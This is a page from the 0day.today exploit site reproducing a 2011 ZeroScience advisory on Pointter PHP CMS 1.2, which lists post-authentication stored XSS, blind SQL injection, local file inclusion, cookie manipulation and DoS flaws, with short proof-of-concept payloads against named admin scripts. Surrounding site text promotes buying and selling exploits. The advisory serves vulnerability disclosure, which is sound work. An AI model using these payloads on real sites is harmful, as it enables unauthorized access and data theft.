0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Pointter PHP Content Management System 1.2 Multiple Vulnerabilities

Author

LiquidWorm

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

Vendor: PangramSoft GmbH
Product web page: http://www.pointter.com
Affected version: 1.2
 
Summary: Pointter PHP Content Management System is an advanced, fast
and user friendly CMS script that can be used to build simple websites
or professional websites with product categorization, product blogs,
member login and search modules. The webmaster can create unlimited
static page boxes, static pages, main categories, sub categories and
product pages.
 
Desc: Pointter CMS suffers from multiple vulnerabilities (post-auth)
including: Stored XSS, bSQLi, LFI, Cookie Manipulation, DoS.
 
Tested on: Microsoft Windows XP Pro SP3 (en)
 
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
 
 
Advisory ID: ZSL-2011-5002
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5002.php
 
 
10.03.2011
 
 
---
XSS:
The stored XSS is pretty much everywhere in the admin panel, just posting the
string '"><script>alert(1)</script>' when editing some category, and on every
return on the main page u get annoyed.
 
LFI:
script: pointtercms/admin/functions/createcategory.php
post param: category
poc: category=../../../../../../../../../test.txt%00&code=0e=0
 
script: pointtercms/admin/functions/createpage.php
post param: pageurl
 
script: pointtercms/admin/functions/createproduct.php
post param: producturl
 
 
bSQLi:
script: pointtercms/admin/functions/editsettings.php
post param: onoff, count, boxname, tonoff, tname, monoff, mname, nonoff, nname,
memonoff, memname, searchonoff, searchname, pos, tpos, mpos, npos, mempos, mail.
poc: onoff=1'+and+sleep(10)%23&pos=0
- Response size: 0 bytes, Duration: 10016 ms



#  0day.today [2024-12-26]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Pointter PHP Content Management System 1.2 Multiple Vulnerabilities

Report Error

Report Error